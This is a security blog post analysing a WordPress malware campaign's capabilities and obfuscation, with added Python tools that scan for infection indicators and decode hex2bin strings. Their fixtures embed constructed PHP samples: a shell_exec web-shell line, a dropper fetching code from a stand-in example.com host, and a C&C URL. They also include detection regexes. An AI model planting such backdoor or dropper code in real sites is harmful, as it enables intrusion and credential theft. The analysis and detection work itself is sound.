Tuesday, May 26, 2020

Websites running WordPress are like catnip for attackers. Among the millions of WordPress installations are many with weak login credentials, and those credentials are what gets exploited to launch malware campaigns like this one.

We first detected this campaign on 13 April, and since then we have seen it blocked by Imunify over 300,000 times. In the past month it has compromised thousands of unprotected WordPress-based websites.

Let's analyze this new campaign to see what makes it dangerous to sites running WordPress.

What Makes It Dangerous

  1. Files can be read and written.

    In this campaign the attacker uses the following code block to read any file the PHP process can read on the compromised server, wp-config.php with its database credentials included:

    [screenshot: Readfile]

    This part of the code lets the attacker upload or write to a file, which is later used to drop more malware into the compromised site:

    [screenshot: writefile]

  2. Plugins can be activated/deactivated.

    Now that the attacker controls the site, they can activate and deactivate its WordPress plugins (for example, to switch off a security plugin) using the following code: 

    [screenshot: activatedeactivateplugins]

  3. Malware can be dropped into the WP folders.

    The malicious code fetches an updated version of the malware from a Command & Control (C&C) server and drops it into the WordPress folders.

    This updated copy is given a freshly generated random file name every time it is fetched, so there is no fixed file name to search for...

    [screenshot: fetchfile]

    ...and is dropped into various locations. One of them is /wp-content/uploads/, a directory that normally holds only uploaded media and should never contain PHP files; the payload can also land in wp-includes, wp-admin, wp-content/themes and wp-content/plugins.

  4. Theme files can be modified.

    The malware also modifies WordPress theme files, injecting references to the malware code it dropped earlier so that the dropped code is loaded along with the theme:

    [screenshot: modifythemefiles]

  5. System-level commands can be executed.

    The following piece of code takes an attacker-supplied OS command and passes it to the PHP functions exec and shell_exec, giving the attacker command execution with the privileges of the PHP process: 

    [screenshot: commandexec]

  6. WordPress credentials are harvested.

    WordPress user credentials are harvested and sent to the C&C server.

    These credentials can be used by the attacker at a later stage to reinfect the site if the malware is removed, so rotating every WordPress password after a clean-up is part of the remediation.
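The capabilities above leave on-disk traces that can be checked without any vendor tooling: PHP files under wp-content/uploads, random alphanumeric file names in the drop directories, theme files that include a file from uploads/, and source that feeds hex2bin() output into exec/shell_exec. The scanner below is an added example written for this article, not code from the original post or from Imunify; the sample site it builds, the file names and the URL inside it are constructed, and the "random name" test is a heuristic assumption rather than something the post states.

```python
import os
import re
import tempfile
from pathlib import Path

# Directories the post names as drop locations. wp-content/uploads holds media
# only, so a .php file there is an indicator on its own.
UPLOADS = "wp-content/uploads"
DROP_DIRS = ("wp-includes", "wp-admin", "wp-content/themes",
             "wp-content/plugins", "wp-content/uploads")

# Source-level indicators: an OS-command function fed the output of hex2bin(),
# a long hex literal being decoded, and a theme/plugin file that pulls in a
# .php file from uploads/ (the "reference to previously dropped code").
SOURCE_INDICATORS = {
    "exec_of_hex2bin": re.compile(
        r"\b(?:shell_exec|exec|system|passthru)\s*\(\s*hex2bin\s*\("),
    "hex2bin_literal": re.compile(
        r"hex2bin\s*\(\s*['\"][0-9a-fA-F]{16,}['\"]\s*\)"),
    "include_from_uploads": re.compile(
        r"\b(?:include|require)(?:_once)?\b[^;]*wp-content/uploads/[^;]*\.php"),
}


def looks_random(name):
    """Heuristic (an assumption, not from the post): a bare alphanumeric basename
    of 8+ characters mixing letters and digits, e.g. k3x9m2p7z1.php. Real core
    and plugin files use words separated by '-' or '.', so they do not match."""
    stem = name[:-4] if name.lower().endswith(".php") else name
    return (len(stem) >= 8 and stem.isalnum()
            and any(c.isdigit() for c in stem) and any(c.isalpha() for c in stem))


def scan_wordpress(root):
    """Walk a WordPress install and return sorted (relative_path, indicator) pairs."""
    root = Path(root)
    findings = set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if rel.startswith(UPLOADS + "/"):
                findings.add((rel, "php_in_uploads"))
            elif looks_random(name) and any(rel.startswith(d + "/") for d in DROP_DIRS):
                findings.add((rel, "random_name_in_drop_dir"))
            try:
                src = path.read_text(errors="replace")
            except OSError:
                continue
            for indicator, pattern in SOURCE_INDICATORS.items():
                if pattern.search(src):
                    findings.add((rel, indicator))
    return sorted(findings)


def build_sample_site():
    """Constructed sample tree (not a real infection): one clean core file plus
    the artefacts the post describes. Returns the temporary root directory."""
    root = Path(tempfile.mkdtemp(prefix="wp-sample-"))
    files = {
        "wp-includes/functions.php":
            "<?php\nfunction wp_sample() { return 1; }\n",
        # random-named dropper that decodes a hex-encoded URL and fetches from it
        "wp-includes/k3x9m2p7z1.php":
            "<?php\n$u = hex2bin('687474703a2f2f6578616d706c652e636f6d2f');\n"
            "@file_put_contents($f, @file_get_contents($u));\n",
        # backdoor dropped into uploads/, running hex-encoded commands
        "wp-content/uploads/2020/05/a8f3k2q9.php":
            "<?php\necho shell_exec(hex2bin($_REQUEST['cmd']));\n",
        # theme file with an injected reference to the dropped backdoor
        "wp-content/themes/sample-theme/functions.php":
            "<?php\ninclude_once ABSPATH . 'wp-content/uploads/2020/05/a8f3k2q9.php';\n"
            "function sample_theme_setup() {}\n",
    }
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return root


def demo():
    """Build the constructed site and scan it."""
    return scan_wordpress(build_sample_site())


if __name__ == "__main__":
    for rel, why in demo():
        print(f"{why:24} {rel}")
```

Point scan_wordpress() at a real document root to use it; the clean wp-includes/functions.php in the sample produces no finding, while each planted artefact is reported at least once. The regexes are deliberately narrow (a literal hex2bin inside an exec call, a literal uploads path inside an include), so treat a hit as something to inspect, not as proof of infection on its own.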

How It Protects Itself

This malware isn't written only to infiltrate the server and exfiltrate data; it also includes evasion and self-protection mechanisms to keep it from being discovered and shut down.

These mechanisms include: 

  1. Encoded communication

    This malware encodes the information exchanged between the C&C server and the hacked site as hexadecimal strings, which are turned back into raw bytes at runtime with PHP's hex2bin() function. Hex encoding is not encryption: it is trivially reversible and only serves to keep readable strings (URLs, commands, file names) out of the source so that simple signature scans miss them.

    In the command-execution code, for example, the $cmd variable that holds the OS command arrives hex-encoded and is passed through hex2bin() to recover the plain command.

  2. Base URL obfuscation

    The base URL of the C&C server is also stored in the malware as a hex-encoded string that is decoded at runtime, so the plain URL never appears in the source:

    [screenshot: url-3]

  3. Communication authorization

    Before establishing communication, the malware authorizes itself with the C&C server using an MD5 token that varies from site to site: 

    [screenshot: auth]

  4. Self-destruct capability

    The malware also has the ability to remove itself from the WordPress files it has infected. It does this with a function named unspread:

    [screenshot: unspread]
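Because the obfuscation is plain hex, both sides of it can be undone offline: the hex2bin() literals in a recovered sample can be decoded to expose the C&C base URL and other hidden strings, and a hex-encoded command captured in an access log or WAF can be decoded to see what the attacker actually ran. The following is an added example written for this article, not the malware's code or Imunify's; the PHP sample, the c2.example.com URL and the captured parameter value are all constructed.

```python
import re

# Matches hex2bin('<hex>') with a literal argument. A variable argument such as
# hex2bin($_REQUEST['cmd']) is the runtime command channel; it is left alone
# here and handled by decode_request_param() below.
HEX2BIN_LITERAL = re.compile(r"hex2bin\s*\(\s*['\"]([0-9a-fA-F]+)['\"]\s*\)")
URL = re.compile(r"https?://[^\s'\"<>]+")


def hex_to_text(hex_string):
    """Decode a hex string to text, or return None when it is not valid hex
    (odd length or non-hex characters), which PHP's hex2bin() would reject."""
    if len(hex_string) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", hex_string):
        return None
    return bytes.fromhex(hex_string).decode("utf-8", errors="replace")


def decode_hex2bin_literals(php_src):
    """Return (hex_literal, decoded_text) for every hex2bin('...') call."""
    out = []
    for m in HEX2BIN_LITERAL.finditer(php_src):
        text = hex_to_text(m.group(1))
        if text is not None:
            out.append((m.group(1), text))
    return out


def deobfuscate(php_src):
    """Rewrite each hex2bin('...') call as the plain PHP string it produces,
    so the sample reads the way the attacker wrote it before encoding."""
    def repl(m):
        text = hex_to_text(m.group(1))
        if text is None:
            return m.group(0)
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return HEX2BIN_LITERAL.sub(repl, php_src)


def extract_c2_urls(php_src):
    """Collect every URL hidden inside hex2bin() literals (the C&C base URL)."""
    urls = set()
    for _, text in decode_hex2bin_literals(php_src):
        urls.update(URL.findall(text))
    return sorted(urls)


def decode_request_param(value):
    """Decode a captured request parameter the way hex2bin($cmd) does on the
    server, revealing the OS command a log would otherwise show only as hex."""
    return hex_to_text(value)


# Constructed sample (not the real malware): the C&C base URL and a file name
# are hex literals; the command arrives hex-encoded in a request parameter.
SAMPLE = """<?php
$base = hex2bin('687474703a2f2f63322e6578616d706c652e636f6d2f');
echo @file_get_contents(hex2bin('77702d636f6e6669672e706870'));
$cmd = hex2bin($_REQUEST['cmd']);
echo shell_exec($cmd);
"""
# Constructed captured parameter value, as it would appear in a request: cmd=756e616d65202d61
CAPTURED_CMD = "756e616d65202d61"

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print("C&C base URL(s):", extract_c2_urls(SAMPLE))
    print("captured command:", decode_request_param(CAPTURED_CMD))
```

Running deobfuscate() on the constructed sample turns the two literals back into 'http://c2.example.com/' and 'wp-config.php' while leaving the runtime hex2bin($_REQUEST['cmd']) call in place, which is exactly the split between what static analysis can recover and what only traffic capture can show. Anything the malware hides this way, including the per-site MD5 token exchange, is visible in cleartext to whoever holds the sample or the logs.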

Detecting And Cleaning This Malware

If you host your site with Browser Daily, we use Imunify360, which detects and removes this malware for you.
